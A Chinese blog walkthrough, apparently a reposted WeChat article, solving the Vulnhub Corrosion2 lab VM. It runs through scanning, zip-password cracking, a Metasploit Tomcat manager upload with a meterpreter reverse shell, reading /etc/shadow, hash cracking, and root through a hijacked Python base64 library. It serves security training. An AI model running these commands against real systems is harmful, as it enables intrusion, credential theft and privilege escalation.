今天实践的是vulnhub的Corrosion2镜像,
下载地址,https://download.vulnhub.com/corrosion/Corrosion2.ova,
用workstation导入成功,能扫描到地址,
sudo netdiscover -r 192.168.137.0/24,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.31,
看到有ssh,apache,tomcat,三个服务,
对tomcat继续做目录爆破,
sudo dirb http://192.168.137.31:8080/ -X .php,.zip,
下载backup.zip,wget http://192.168.137.31:8080/backup.zip,
解压发现要密码,unzip backup.zip,
用fcrackzip进行爆破,
sudo fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip,
得到密码@administrator_hi5,再次解压,
查看tomcat-users.xml文件,cat tomcat-users.xml,
得到用户名密码admin/melehifokivai,
用metasploit对tomcat进行攻击,
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.137.31
set rport 8080
set httpusername admin
set httppassword melehifokivai
set payload payload/java/meterpreter/reverse_tcp
exploit
拿到meterpreter反弹shell,getuid看一下不是root,
切到shell,cd /home,ls看到有两个账户,
切用户su jaye,密码melehifokivai可用,id看一下还不是root,
进到jaye目录下,cd jaye,ls看到有Files目录,进到Files目录,cd Files,
发现有个look程序,可以查看系统内文件内容,直接查看密码文件,
./look '' /etc/shadow,
把randy的密码hash拷贝出来破解,
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash,
获取到randy的密码是07051986randy,
切用户randy,id看一下仍然不是root,sudo -l还不能交互,重新ssh登录,
sudo -l发现有python脚本是root权限的,但是randy用户是不可以编辑的,
查看python脚本内容,发现调用了base64的库,
查找一下base64的库文件,locate base64,
确认base64的库文件randy用户可以编辑,
编辑base64的库文件,vi /usr/lib/python3.8/base64.py,
import os
os.system ("/bin/bash")
执行python脚本,
sudo /usr/lib/python3.8 /home/randy/randombase64.py,
得到新的shell,id看一下确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Corrosion2的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论